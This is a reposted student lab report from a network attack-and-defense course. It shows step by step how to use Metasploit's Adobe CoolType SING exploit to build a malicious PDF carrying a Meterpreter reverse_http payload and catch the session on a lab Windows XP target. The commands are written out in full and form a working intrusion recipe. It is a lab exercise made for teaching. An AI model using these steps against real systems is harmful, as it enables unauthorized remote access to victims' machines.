20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

最新推荐文章于 2017-05-12 19:17:00 发布
最新推荐文章于 2017-05-12 19:17:00 发布
阅读量139 收藏 1
点赞数
原文链接:http://www.cnblogs.com/20145335hh/p/6701315.html
版权

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

实验内容

  • 初步掌握平台matesploit的使用

  • 有了初步完成渗透操作的思路

  • 本次攻击对象为:windows xp sp3 / Adobe 9.3

  • 主机为kali的ip地址为:192.168.199.220、靶机windows xp 的ip地址为:192.168.199.137

884698-20170412204907720-328676829.png

884698-20170412204918767-1826991183.png

实验步骤

  • 使用命令msfconsole进入控制台

  • 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用info命令查看模块的基本信息,以及参数要求,使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块

    设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http

    之后使用命令show options来确定需要修改的参数(截图省略)

    需要设置的参数有LHOSTLPORTFILENAME

    命令为

          set LHOST 192.168.199.220
      set LPORT 5335
      set FILENAME 5335.pdf

884698-20170412205022220-482933102.png

  • 使用命令exploit生成5335.pdf

884698-20170412205031205-621073537.png

  • 注意其生成路径,是一个隐藏文件夹,此时可以打开一个新的cmd,使用名命令cp 5335.pdf /root/5335.pdf将其移动出来

884698-20170412205205251-140158813.png

  • 之后退出并从新进入msf平台,使用命令msfconsole

884698-20170412205043033-219080677.png

  • 使用命令 use exploit/multi/handler进入监听模式,并设置好参数,确认无误后,执行exploit等待被攻击者的接听。

884698-20170412205058283-809833955.png

884698-20170412205108173-42730924.png

884698-20170412205118267-1154285532.png

  • 连接成功,使用命令sysinfo可以轻而易举的获得靶机的信息

884698-20170412205132830-42281458.png

也可以使用ipconfig查看靶机信息

884698-20170412205142830-1379077876.png

实验中遇到的问题

  • 起初在kali中生成了5335.pdf后不知道如何将其传输到靶机中(后来采用ncat传过去的),其中采用过qq邮箱进行传输,但是遇到了一下问题

    884698-20170412205243283-435655807.png

    后来完成实验我在想,既然邮件能被查杀出来,难道不就说明腾讯能查看到我们的信息,有时候是个好事,利用云查杀解决一些不必要的烦恼,但是如果邮件中含有一些个人隐私信息呢,这是好事还是坏事。

转载于:https://www.cnblogs.com/20145335hh/p/6701315.html

weixin_30412577
关注
DIG:Dive into Graphs是用于图深度学习研究的交钥匙库。-Python开发
05-25
DIG:用于图深度学习研究的总库,刘萌*,罗有志*,王丽梅*,谢耀辰*,郝昊*,桂树瑞,赵旭,余海阳,张静屯,刘毅,严克强,宝拉·奥兹特金(Bora Oztekin),刘浩然(Haoran Liu),张璇,丛聪(Cong Fu)和姬水旺...
Metasploits之Adobe阅读器漏洞
weixin_30379911的博客
07-27 209
实验环境:Kali 2.0+Windows XP+Adobe Reader 9.3.0 类别:缓冲区溢出 描述:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。 msfconsole 启动Metasploits search cooltype_sing 搜索Adobe阅读器漏洞(ado...
Adobe阅读器渗透攻击
weixin_30388677的博客
04-09 105
Adobe阅读器渗透攻击 实验前准备 1、两台虚拟机,其中一台为kali,一台为windows xp sp3(老师给的xp虚拟机winxpAttaker,密码:mima1234)。 2、设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通。 3、kali下打开显示隐藏文件,如下图,先打开主文件夹,在右上角打开如下图所示位置: 实验步骤: 1、在kali终端中开启msfconsole。 2、输...
20145335郝昊网络攻防Exp 4 利用nmap扫描
weixin_30284355的博客
04-12 125
20145335郝昊网络攻防Exp 4 利用nmap扫描 实验原理 使用msf辅助模块,nmap来扫描发现局域网中的主机ip 实验步骤 首先使用命令创建一个msf所需的数据库 service postgresql start msfdb start 之后使用命令msfconsole开启msf 输入命令 use auxiliary/scanner/discovery...
20145335郝昊网络攻防Exp4 MS11_050
weixin_30896763的博客
04-12 134
20145335郝昊网络攻防Exp4 MS11_050 实验内容 初步掌握平台matesploit的使用 了解漏洞MS11_050漏洞:use-after-free漏洞,即对象被释放之后,对应指针并没有被置为NULL,被释放的内存中的数据可能会被其他对象的函数非法调用 影响范围:IE7 和IE 8 其他的版本好像并不存在这个漏洞。 实验步骤 使用命令msfconsole命令进入控制台 使...
20145335郝昊网络攻防Exp5 MS08_067漏洞测试
weixin_30788731的博客
04-12 129
20145335郝昊网络攻防Exp5 MS08_067漏洞测试 实验内容 了解掌握metasploit平台的一些基本操作,能学会利用已知信息完成简单的渗透操作。 漏洞MS08_067:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏...
20145335郝昊网络攻防Exp9 Web安全基础实践
weixin_30709061的博客
05-12 136
20145335郝昊网络攻防Exp9 Web安全基础实践 实验内容 理解常用网络攻击技术的基本原理。 完成WebGoat实践下相关实验 实验步骤 XSS注入攻击 Phishing with XSS 这个XSS攻击比较简单,需要的是在网页的文本框里写一个钓鱼网站,仔细读给的题目就可以分析出来(但是英语四级没过的我很伤=_=) </form> <script&g...
20145335郝昊网络攻防Exp7 网络欺诈技术防范
weixin_30594001的博客
04-25 146
20145335郝昊网络攻防Exp7 网络欺诈技术防范 实验内容 本次实践本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。 简单应用SET工具建立冒名网站。 利用软件ettercap DNS spoof,实现dns欺骗。 实验步骤 URL攻击实验 首先确认kali主机和靶机在同一网段,且能相互ping通。 为了使得apache开启后,靶机通过IP地址能直接访问...
20145335郝昊网络攻防》恶意代码分析
weixin_30872789的博客
03-29 140
20145335郝昊网络攻防》恶意代码分析 实验内容 恶意代码的免杀和恶意代码的分析是相互对立的也是相互依托的,当对电脑中的恶意代码进行分析的过程,也就是对于恶意代码逃避查杀的过程,而恶意代码免杀也就是对于恶意代码的分析之后的结果,是否可以逃避查杀或者不能逃避查杀。 本次实验用到了计算机病毒课上老师使用的一些软件,来分析和判断恶意代码的行为。 实验过程 利用计划任务分析 每间隔3分钟对记录...
weixin007医院管理系统+Springboot.rar
09-13
所有源码,都是可以运行起来的
5G网络优化:片区满意度交流材料.pptx
09-13
5G网络优化
操作系统内可以一键关闭WD
09-13
操作系统内可以一键关闭WD
weixin086基于微信小程序的影院选座系统+ssm.rar
09-13
所有源码,都是可以运行起来的
基于java的学生评奖评优管理系统的设计与实现.docx
09-13
基于java的学生评奖评优管理系统的设计与实现.docx
基于java的电商应用系统的设计与实现.docx
09-13
基于java的电商应用系统的设计与实现.docx
基于java的的学生干部管理系统设计与实现.docx
09-13
基于java的的学生干部管理系统设计与实现.docx
保险Web应用后端系统.zip
最新发布
09-13
这是一个基于Java和Spring的web保险系统的后端代码。系统采用Spring Bo快ot速搭建和配置应用,并设计了Bean、Dao、Service和Controller层,实现RESTful Web服务。后端设计包括创建Oracle数据库中的表,并开发了存储过程、函数、触发器和序列等复杂数据库对象。通过Spring Security实现认证和授权。此外,系统还实现了使用Javamail发送确认和通知邮件的功能,使用iTextPDF库生成用户发票的PDF文件,并通过Spring AOP监控和记录后端函数性能。该项目是一个开源的演示项目,由Jingjing Yang开发和维护。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
强化学习与模糊逻辑结合的异构蜂窝网络容量与覆盖优化
"这篇论文探讨了在异构蜂窝网络中,如何通过基于FQLC(模糊逻辑与Q学习算法的融合)的自优化控制系统解决微蜂窝密集部署带来的容量与覆盖问题。研究背景是4G/5G时代,随着网络密度增加,微蜂窝部署的不规则性对网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值